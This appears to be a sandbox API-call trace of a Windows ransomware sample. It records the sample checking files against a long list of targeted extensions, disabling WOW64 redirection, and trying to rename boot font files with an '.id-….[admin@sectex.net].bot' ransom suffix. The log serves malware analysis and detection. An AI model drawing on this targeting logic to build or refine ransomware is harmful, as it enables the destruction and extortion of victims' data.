	[0137.435] lstrcmpiW (lpString1=".7z", lpString2="bot") returned -1
	[0137.435] lstrlenW (lpString=".accda") returned 6
	[0137.435] lstrcmpiW (lpString1=".accda", lpString2="t].bot") returned -1
	[0137.435] lstrlenW (lpString=".accdb") returned 6
	[0137.435] lstrcmpiW (lpString1=".accdb", lpString2="t].bot") returned -1
	[0137.436] lstrlenW (lpString=".accdc") returned 6
	[0137.436] lstrcmpiW (lpString1=".accdc", lpString2="t].bot") returned -1
	[0137.436] lstrlenW (lpString=".accde") returned 6
	[0137.436] lstrcmpiW (lpString1=".accde", lpString2="t].bot") returned -1
	[0137.436] lstrlenW (lpString=".accdt") returned 6
	[0137.436] lstrcmpiW (lpString1=".accdt", lpString2="t].bot") returned -1
	[0137.436] lstrlenW (lpString=".accdw") returned 6
	[0137.436] lstrcmpiW (lpString1=".accdw", lpString2="t].bot") returned -1
	[0137.436] lstrlenW (lpString=".adb") returned 4
	[0137.436] lstrcmpiW (lpString1=".adb", lpString2=".bot") returned -1
	[0137.436] lstrlenW (lpString=".adp") returned 4
	[0137.436] lstrcmpiW (lpString1=".adp", lpString2=".bot") returned -1
	[0137.436] lstrlenW (lpString=".ai") returned 3
	[0137.436] lstrcmpiW (lpString1=".ai", lpString2="bot") returned -1
	[0137.436] lstrlenW (lpString=".ai3") returned 4
	[0137.436] lstrcmpiW (lpString1=".ai3", lpString2=".bot") returned -1
	[0137.436] lstrlenW (lpString=".ai4") returned 4
	[0137.436] lstrcmpiW (lpString1=".ai4", lpString2=".bot") returned -1
	[0137.436] lstrlenW (lpString=".ai5") returned 4
	[0137.436] lstrcmpiW (lpString1=".ai5", lpString2=".bot") returned -1
	[0137.436] lstrlenW (lpString=".ai6") returned 4
	[0137.436] lstrcmpiW (lpString1=".ai6", lpString2=".bot") returned -1
	[0137.436] lstrlenW (lpString=".ai7") returned 4
	[0137.436] lstrcmpiW (lpString1=".ai7", lpString2=".bot") returned -1
	[0137.436] lstrlenW (lpString=".ai8") returned 4
	[0137.436] lstrcmpiW (lpString1=".ai8", lpString2=".bot") returned -1
	[0137.436] lstrlenW (lpString=".anim") returned 5
	[0137.436] lstrcmpiW (lpString1=".anim", lpString2="].bot") returned -1
	[0137.436] lstrlenW (lpString=".arw") returned 4
	[0137.436] lstrcmpiW (lpString1=".arw", lpString2=".bot") returned -1
	[0137.436] lstrlenW (lpString=".as") returned 3
	[0137.436] lstrcmpiW (lpString1=".as", lpString2="bot") returned -1
	[0137.436] lstrlenW (lpString=".asa") returned 4
	[0137.436] lstrcmpiW (lpString1=".asa", lpString2=".bot") returned -1
	[0137.436] lstrlenW (lpString=".asc") returned 4
	[0137.436] lstrcmpiW (lpString1=".asc", lpString2=".bot") returned -1
	[0137.437] lstrlenW (lpString=".ascx") returned 5
	[0137.437] lstrcmpiW (lpString1=".ascx", lpString2="].bot") returned -1
	[0137.437] lstrlenW (lpString=".asm") returned 4
	[0137.437] lstrcmpiW (lpString1=".asm", lpString2=".bot") returned -1
	[0137.437] lstrlenW (lpString=".asmx") returned 5
	[0137.437] lstrcmpiW (lpString1=".asmx", lpString2="].bot") returned -1
	[0137.437] lstrlenW (lpString=".asp") returned 4
	[0137.437] lstrcmpiW (lpString1=".asp", lpString2=".bot") returned -1
	[0137.437] lstrlenW (lpString=".aspx") returned 5
	[0137.437] lstrcmpiW (lpString1=".aspx", lpString2="].bot") returned -1
	[0137.437] lstrlenW (lpString=".asr") returned 4
	[0137.437] lstrcmpiW (lpString1=".asr", lpString2=".bot") returned -1
	[0137.437] lstrlenW (lpString=".asx") returned 4
	[0137.437] lstrcmpiW (lpString1=".asx", lpString2=".bot") returned -1
	[0137.437] lstrlenW (lpString=".avi") returned 4
	[0137.437] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0137.437] lstrlenW (lpString=".avs") returned 4
	[0137.437] lstrcmpiW (lpString1=".avs", lpString2=".bot") returned -1
	[0137.437] lstrlenW (lpString=".backup") returned 7
	[0137.437] lstrcmpiW (lpString1=".backup", lpString2="et].bot") returned -1
	[0137.437] lstrlenW (lpString=".bak") returned 4
	[0137.437] lstrcmpiW (lpString1=".bak", lpString2=".bot") returned -1
	[0137.437] lstrlenW (lpString=".bay") returned 4
	[0137.437] lstrcmpiW (lpString1=".bay", lpString2=".bot") returned -1
	[0137.437] lstrlenW (lpString=".bd") returned 3
	[0137.437] lstrcmpiW (lpString1=".bd", lpString2="bot") returned -1
	[0137.437] lstrlenW (lpString=".bin") returned 4
	[0137.437] lstrcmpiW (lpString1=".bin", lpString2=".bot") returned -1
	[0137.437] lstrlenW (lpString=".bmp") returned 4
	[0137.437] lstrcmpiW (lpString1=".bmp", lpString2=".bot") returned -1
	[0137.437] lstrlenW (lpString=".bz2") returned 4
	[0137.437] lstrcmpiW (lpString1=".bz2", lpString2=".bot") returned 1
	[0137.437] lstrlenW (lpString=".c") returned 2
	[0137.437] lstrcmpiW (lpString1=".c", lpString2="ot") returned -1
	[0137.437] lstrlenW (lpString=".cdr") returned 4
	[0137.438] lstrcmpiW (lpString1=".cdr", lpString2=".bot") returned 1
	[0137.438] lstrlenW (lpString=".cer") returned 4
	[0137.438] lstrcmpiW (lpString1=".cer", lpString2=".bot") returned 1
	[0137.438] lstrlenW (lpString=".cf") returned 3
	[0137.438] lstrcmpiW (lpString1=".cf", lpString2="bot") returned -1
	[0137.438] lstrlenW (lpString=".cfc") returned 4
	[0137.438] lstrcmpiW (lpString1=".cfc", lpString2=".bot") returned 1
	[0137.438] lstrlenW (lpString=".cfm") returned 4
	[0137.438] lstrcmpiW (lpString1=".cfm", lpString2=".bot") returned 1
	[0137.438] lstrlenW (lpString=".cfml") returned 5
	[0137.438] lstrcmpiW (lpString1=".cfml", lpString2="].bot") returned -1
	[0137.438] lstrlenW (lpString=".cfu") returned 4
	[0137.438] lstrcmpiW (lpString1=".cfu", lpString2=".bot") returned 1
	[0137.438] lstrlenW (lpString=".chm") returned 4
	[0137.438] lstrcmpiW (lpString1=".chm", lpString2=".bot") returned 1
	[0137.438] lstrlenW (lpString=".cin") returned 4
	[0137.438] lstrcmpiW (lpString1=".cin", lpString2=".bot") returned 1
	[0137.438] lstrlenW (lpString=".class") returned 6
	[0137.438] lstrcmpiW (lpString1=".class", lpString2="t].bot") returned -1
	[0137.438] lstrlenW (lpString=".clx") returned 4
	[0137.438] lstrcmpiW (lpString1=".clx", lpString2=".bot") returned 1
	[0137.438] lstrlenW (lpString=".config") returned 7
	[0137.438] lstrcmpiW (lpString1=".config", lpString2="et].bot") returned -1
	[0137.438] lstrlenW (lpString=".cpp") returned 4
	[0137.438] lstrcmpiW (lpString1=".cpp", lpString2=".bot") returned 1
	[0137.438] lstrlenW (lpString=".cr2") returned 4
	[0137.438] lstrcmpiW (lpString1=".cr2", lpString2=".bot") returned 1
	[0137.438] lstrlenW (lpString=".crt") returned 4
	[0137.438] lstrcmpiW (lpString1=".crt", lpString2=".bot") returned 1
	[0137.438] lstrlenW (lpString=".crw") returned 4
	[0137.438] lstrcmpiW (lpString1=".crw", lpString2=".bot") returned 1
	[0137.438] lstrlenW (lpString=".cs") returned 3
	[0137.438] lstrcmpiW (lpString1=".cs", lpString2="bot") returned -1
	[0137.438] lstrlenW (lpString=".css") returned 4
	[0137.438] lstrcmpiW (lpString1=".css", lpString2=".bot") returned 1
	[0137.438] lstrlenW (lpString=".csv") returned 4
	[0137.439] lstrcmpiW (lpString1=".csv", lpString2=".bot") returned 1
	[0137.439] lstrlenW (lpString=".cub") returned 4
	[0137.439] lstrcmpiW (lpString1=".cub", lpString2=".bot") returned 1
	[0137.439] lstrlenW (lpString=".dae") returned 4
	[0137.439] lstrcmpiW (lpString1=".dae", lpString2=".bot") returned 1
	[0137.439] lstrlenW (lpString=".dat") returned 4
	[0137.439] lstrcmpiW (lpString1=".dat", lpString2=".bot") returned 1
	[0137.439] lstrlenW (lpString=".db") returned 3
	[0137.439] lstrcmpiW (lpString1=".db", lpString2="bot") returned -1
	[0137.439] lstrlenW (lpString=".dbf") returned 4
	[0137.439] lstrcmpiW (lpString1=".dbf", lpString2=".bot") returned 1
	[0137.439] lstrlenW (lpString=".dbx") returned 4
	[0137.439] lstrcmpiW (lpString1=".dbx", lpString2=".bot") returned 1
	[0137.439] lstrlenW (lpString=".dc3") returned 4
	[0137.439] lstrcmpiW (lpString1=".dc3", lpString2=".bot") returned 1
	[0137.439] lstrlenW (lpString=".dcm") returned 4
	[0137.439] lstrcmpiW (lpString1=".dcm", lpString2=".bot") returned 1
	[0137.439] lstrlenW (lpString=".dcr") returned 4
	[0137.439] lstrcmpiW (lpString1=".dcr", lpString2=".bot") returned 1
	[0137.439] lstrlenW (lpString=".der") returned 4
	[0137.439] lstrcmpiW (lpString1=".der", lpString2=".bot") returned 1
	[0137.439] lstrlenW (lpString=".dib") returned 4
	[0137.439] lstrcmpiW (lpString1=".dib", lpString2=".bot") returned 1
	[0137.439] lstrlenW (lpString=".dic") returned 4
	[0137.439] lstrcmpiW (lpString1=".dic", lpString2=".bot") returned 1
	[0137.439] lstrlenW (lpString=".dif") returned 4
	[0137.439] lstrcmpiW (lpString1=".dif", lpString2=".bot") returned 1
	[0137.439] lstrlenW (lpString=".divx") returned 5
	[0137.439] lstrcmpiW (lpString1=".divx", lpString2="].bot") returned -1
	[0137.439] lstrlenW (lpString=".djvu") returned 5
	[0137.439] lstrcmpiW (lpString1=".djvu", lpString2="].bot") returned -1
	[0137.439] lstrlenW (lpString=".dng") returned 4
	[0137.439] lstrcmpiW (lpString1=".dng", lpString2=".bot") returned 1
	[0137.439] lstrlenW (lpString=".doc") returned 4
	[0137.439] lstrcmpiW (lpString1=".doc", lpString2=".bot") returned 1
	[0137.439] lstrlenW (lpString=".docm") returned 5
	[0137.440] lstrcmpiW (lpString1=".docm", lpString2="].bot") returned -1
	[0137.440] lstrlenW (lpString=".docx") returned 5
	[0137.440] lstrcmpiW (lpString1=".docx", lpString2="].bot") returned -1
	[0137.440] lstrlenW (lpString=".dot") returned 4
	[0137.440] lstrcmpiW (lpString1=".dot", lpString2=".bot") returned 1
	[0137.440] lstrlenW (lpString=".dotm") returned 5
	[0137.440] lstrcmpiW (lpString1=".dotm", lpString2="].bot") returned -1
	[0137.440] lstrlenW (lpString=".dotx") returned 5
	[0137.440] lstrcmpiW (lpString1=".dotx", lpString2="].bot") returned -1
	[0137.440] lstrlenW (lpString=".dpx") returned 4
	[0137.440] lstrcmpiW (lpString1=".dpx", lpString2=".bot") returned 1
	[0137.440] lstrlenW (lpString=".dqy") returned 4
	[0137.440] lstrcmpiW (lpString1=".dqy", lpString2=".bot") returned 1
	[0137.440] lstrlenW (lpString=".dsn") returned 4
	[0137.440] lstrcmpiW (lpString1=".dsn", lpString2=".bot") returned 1
	[0137.440] lstrlenW (lpString=".dt") returned 3
	[0137.440] lstrcmpiW (lpString1=".dt", lpString2="bot") returned -1
	[0137.440] lstrlenW (lpString=".dtd") returned 4
	[0137.440] lstrcmpiW (lpString1=".dtd", lpString2=".bot") returned 1
	[0137.440] lstrlenW (lpString=".dwg") returned 4
	[0137.440] lstrcmpiW (lpString1=".dwg", lpString2=".bot") returned 1
	[0137.440] lstrlenW (lpString=".dwt") returned 4
	[0137.440] lstrcmpiW (lpString1=".dwt", lpString2=".bot") returned 1
	[0137.440] lstrlenW (lpString=".dx") returned 3
	[0137.440] lstrcmpiW (lpString1=".dx", lpString2="bot") returned -1
	[0137.440] lstrlenW (lpString=".dxf") returned 4
	[0137.440] lstrcmpiW (lpString1=".dxf", lpString2=".bot") returned 1
	[0137.440] lstrlenW (lpString=".edml") returned 5
	[0137.440] lstrcmpiW (lpString1=".edml", lpString2="].bot") returned -1
	[0137.440] lstrlenW (lpString=".efd") returned 4
	[0137.440] lstrcmpiW (lpString1=".efd", lpString2=".bot") returned 1
	[0137.440] lstrlenW (lpString=".elf") returned 4
	[0137.440] lstrcmpiW (lpString1=".elf", lpString2=".bot") returned 1
	[0137.440] lstrlenW (lpString=".emf") returned 4
	[0137.440] lstrcmpiW (lpString1=".emf", lpString2=".bot") returned 1
	[0137.440] lstrlenW (lpString=".emz") returned 4
	[0137.441] lstrcmpiW (lpString1=".emz", lpString2=".bot") returned 1
	[0137.441] lstrlenW (lpString=".epf") returned 4
	[0137.441] lstrcmpiW (lpString1=".epf", lpString2=".bot") returned 1
	[0137.441] lstrlenW (lpString=".eps") returned 4
	[0137.441] lstrcmpiW (lpString1=".eps", lpString2=".bot") returned 1
	[0137.441] lstrlenW (lpString=".epsf") returned 5
	[0137.441] lstrcmpiW (lpString1=".epsf", lpString2="].bot") returned -1
	[0137.441] lstrlenW (lpString=".epsp") returned 5
	[0137.441] lstrcmpiW (lpString1=".epsp", lpString2="].bot") returned -1
	[0137.441] lstrlenW (lpString=".erf") returned 4
	[0137.441] lstrcmpiW (lpString1=".erf", lpString2=".bot") returned 1
	[0137.441] lstrlenW (lpString=".exr") returned 4
	[0137.441] lstrcmpiW (lpString1=".exr", lpString2=".bot") returned 1
	[0137.441] lstrlenW (lpString=".f4v") returned 4
	[0137.441] lstrcmpiW (lpString1=".f4v", lpString2=".bot") returned 1
	[0137.441] lstrlenW (lpString=".fido") returned 5
	[0137.441] lstrcmpiW (lpString1=".fido", lpString2="].bot") returned -1
	[0137.441] lstrlenW (lpString=".flm") returned 4
	[0137.441] lstrcmpiW (lpString1=".flm", lpString2=".bot") returned 1
	[0137.441] lstrlenW (lpString=".flv") returned 4
	[0137.441] lstrcmpiW (lpString1=".flv", lpString2=".bot") returned 1
	[0137.441] lstrlenW (lpString=".frm") returned 4
	[0137.444] FindNextFileW (in: hFindFile=0x7baff70, lpFindFileData=0xa7cfa84 | out: lpFindFileData=0xa7cfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xf2e1bfe0, ftLastAccessTime.dwHighDateTime=0x1d58eed, ftLastWriteTime.dwLowDateTime=0xf2e1bfe0, ftLastWriteTime.dwHighDateTime=0x1d58eed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0137.444] FindNextFileW (in: hFindFile=0x7baff70, lpFindFileData=0xa7cfa84 | out: lpFindFileData=0xa7cfa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1
	[0137.625] FindNextFileW (in: hFindFile=0x7ba8448, lpFindFileData=0xa7cf808 | out: lpFindFileData=0xa7cf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0137.625] FindNextFileW (in: hFindFile=0x7ba8448, lpFindFileData=0xa7cf808 | out: lpFindFileData=0xa7cf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1

Thread:
	id = 60
	os_tid = 0x77c

	[0137.446] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10000) returned 0xa0000a0
	[0137.447] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10000) returned 0xa0100a8
	[0137.447] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baeab8
	[0137.447] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x6) returned 0x7bac848
	[0137.447] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baead0
	[0137.447] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x100000) returned 0xb290020
	[0137.447] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baeae8
	[0137.447] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7baeae8, Size=0x20) returned 0x7b65b58
	[0137.447] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baeae8
	[0137.448] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7baeae8, Size=0x20) returned 0x7b65ab8
	[0137.448] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0137.448] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0137.448] Wow64DisableWow64FsRedirection (in: OldValue=0xa9cff58 | out: OldValue=0xa9cff58*=0x0) returned 1
	[0137.448] lstrlenW (lpString="kernel32.dll") returned 12
	[0137.448] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b65b58 | out: hHeap=0x7ab0000) returned 1
	[0137.448] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0137.448] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b65ab8 | out: hHeap=0x7ab0000) returned 1
	[0137.448] Sleep (dwMilliseconds=0x64) 
	[0137.597] Sleep (dwMilliseconds=0x64) 
	[0137.820] lstrcmpiW (lpString1=".ttf", lpString2=".bot") returned 1
	[0137.820] lstrlenW (lpString="chs_boot.ttf") returned 12
	[0137.820] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x294
	[0137.820] GetFileSizeEx (in: hFile=0x294, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=3694080) returned 1
	[0137.820] CloseHandle (hObject=0x294) returned 1
	[0137.820] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf")) returned 0x20
	[0137.821] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0137.821] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0137.821] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26
	[0137.821] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26
	[0137.821] lstrlenW (lpString=".doc") returned 4
	[0137.821] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1
	[0137.821] lstrlenW (lpString=".docx") returned 5
	[0137.821] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1
	[0137.821] lstrlenW (lpString=".pdf") returned 4
	[0137.821] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1
	[0137.821] lstrlenW (lpString=".xls") returned 4
	[0137.821] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1
	[0137.821] lstrlenW (lpString=".xlsx") returned 5
	[0137.821] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1
	[0137.821] lstrlenW (lpString=".ppt") returned 4
	[0137.821] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1
	[0137.821] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26
	[0137.821] lstrlenW (lpString=".zip") returned 4
	[0137.821] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1
	[0137.821] lstrlenW (lpString=".rar") returned 4
	[0137.821] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1
	[0137.821] lstrlenW (lpString=".bz2") returned 4
	[0137.821] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1
	[0137.821] lstrlenW (lpString=".7z") returned 3
	[0137.821] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1
	[0137.821] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26
	[0137.821] lstrlenW (lpString=".dbf") returned 4
	[0137.821] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1
	[0137.821] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26
	[0137.822] lstrlenW (lpString=".1cd") returned 4
	[0137.822] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1
	[0137.822] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26
	[0137.822] lstrlenW (lpString=".jpg") returned 4
	[0137.822] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1
	[0137.822] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26
	[0137.822] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26
	[0137.822] lstrlenW (lpString=".doc") returned 4
	[0137.822] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1
	[0137.822] lstrlenW (lpString=".docx") returned 5
	[0137.822] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1
	[0137.822] lstrlenW (lpString=".pdf") returned 4
	[0137.822] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1
	[0137.822] lstrlenW (lpString=".xls") returned 4
	[0137.822] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1
	[0137.822] lstrlenW (lpString=".xlsx") returned 5
	[0137.822] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1
	[0137.822] lstrlenW (lpString=".ppt") returned 4
	[0137.822] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1
	[0137.822] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26
	[0137.822] lstrlenW (lpString=".zip") returned 4
	[0137.822] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1
	[0137.822] lstrlenW (lpString=".rar") returned 4
	[0137.822] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1
	[0137.822] lstrlenW (lpString=".bz2") returned 4
	[0137.822] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1
	[0137.822] lstrlenW (lpString=".7z") returned 3
	[0137.822] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1
	[0137.822] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26
	[0137.822] lstrlenW (lpString=".dbf") returned 4
	[0137.822] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1
	[0137.822] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26
	[0137.822] lstrlenW (lpString=".1cd") returned 4
	[0137.822] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1
	[0137.823] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26
	[0137.823] lstrlenW (lpString=".jpg") returned 4
	[0137.823] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1
	[0137.823] lstrcmpiW (lpString1=".ttf", lpString2=".bot") returned 1
	[0137.823] lstrlenW (lpString="cht_boot.ttf") returned 12
	[0137.823] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320
	[0138.043] GetFileSizeEx (in: hFile=0x320, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=3876772) returned 1
	[0138.043] CloseHandle (hObject=0x320) returned 1
	[0138.043] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf")) returned 0x20
	[0138.043] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.043] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0138.043] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0138.043] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0138.043] lstrlenW (lpString=".doc") returned 4
	[0138.043] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1
	[0138.043] lstrlenW (lpString=".docx") returned 5
	[0138.043] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1
	[0138.043] lstrlenW (lpString=".pdf") returned 4
	[0138.043] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1
	[0138.044] lstrlenW (lpString=".xls") returned 4
	[0138.044] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1
	[0138.044] lstrlenW (lpString=".xlsx") returned 5
	[0138.044] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1
	[0138.044] lstrlenW (lpString=".ppt") returned 4
	[0138.044] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1
	[0138.044] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0138.044] lstrlenW (lpString=".zip") returned 4
	[0138.044] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1
	[0138.044] lstrlenW (lpString=".rar") returned 4
	[0138.044] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1
	[0138.044] lstrlenW (lpString=".bz2") returned 4
	[0138.044] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1
	[0138.044] lstrlenW (lpString=".7z") returned 3
	[0138.044] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1
	[0138.044] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0138.044] lstrlenW (lpString=".dbf") returned 4
	[0138.044] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1
	[0138.044] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0138.044] lstrlenW (lpString=".1cd") returned 4
	[0138.044] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1
	[0138.044] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0138.044] lstrlenW (lpString=".jpg") returned 4
	[0138.044] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1
	[0138.044] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0138.044] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0138.044] lstrlenW (lpString=".doc") returned 4
	[0138.044] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1
	[0138.044] lstrlenW (lpString=".docx") returned 5
	[0138.044] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1
	[0138.044] lstrlenW (lpString=".pdf") returned 4
	[0138.044] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1
	[0138.044] lstrlenW (lpString=".xls") returned 4
	[0138.045] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1
	[0138.045] lstrlenW (lpString=".xlsx") returned 5
	[0138.045] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1
	[0138.045] lstrlenW (lpString=".ppt") returned 4
	[0138.045] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1
	[0138.045] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0138.045] lstrlenW (lpString=".zip") returned 4
	[0138.045] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1
	[0138.045] lstrlenW (lpString=".rar") returned 4
	[0138.045] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1
	[0138.045] lstrlenW (lpString=".bz2") returned 4
	[0138.045] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1
